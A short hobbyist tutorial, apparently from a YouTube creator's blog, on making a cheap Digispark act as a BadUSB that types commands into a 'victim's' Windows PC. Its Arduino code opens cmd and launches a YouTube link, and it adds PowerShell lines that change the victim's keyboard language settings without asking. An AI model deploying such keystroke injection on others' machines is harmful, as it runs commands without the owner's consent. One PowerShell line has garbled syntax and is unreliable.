Hello everyone and welcome back!
Today we will be playing with the 1 $ badUsb – Digispark.
Start up your Arduino IDE and type in the following:
If your victim is using an english keyboard all you have to write is
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(2000);
DigiKeyboard.println(“cmd”);
DigiKeyboard.delay(700)
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.println(“start https://www.youtube.com/YOURVIDEO”);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
If however you DONT use an English keyboard by default you are gonna have to figure out how to change victim’s PC language to English (its kinda possible to do it without changing but REALLY weird and takes a long time) – To find out more about this visit my ruber ducky video on youtube (same rules apply to the ducky). Put this line on the beginning of the code along with a windows key before and enter after.
So to change to English my command was:
DigiKeyboard.println(“Powershell.exe /Command Set/WinUserLanguageList /LanguageList en/GB, hr/HR /Force”);
to change it back (now we dont have to use different symbols because our Digispark is writing in English and using the Enlgish layout- the one we changed on the beginning) : 
DigiKeyboard.println(“Powershell.exe -Command Set-WinUserLanguageList -LanguageList hr/HR -Force”);
And that’s all !!
Thank you so much for visiting and have a nice day 🙂
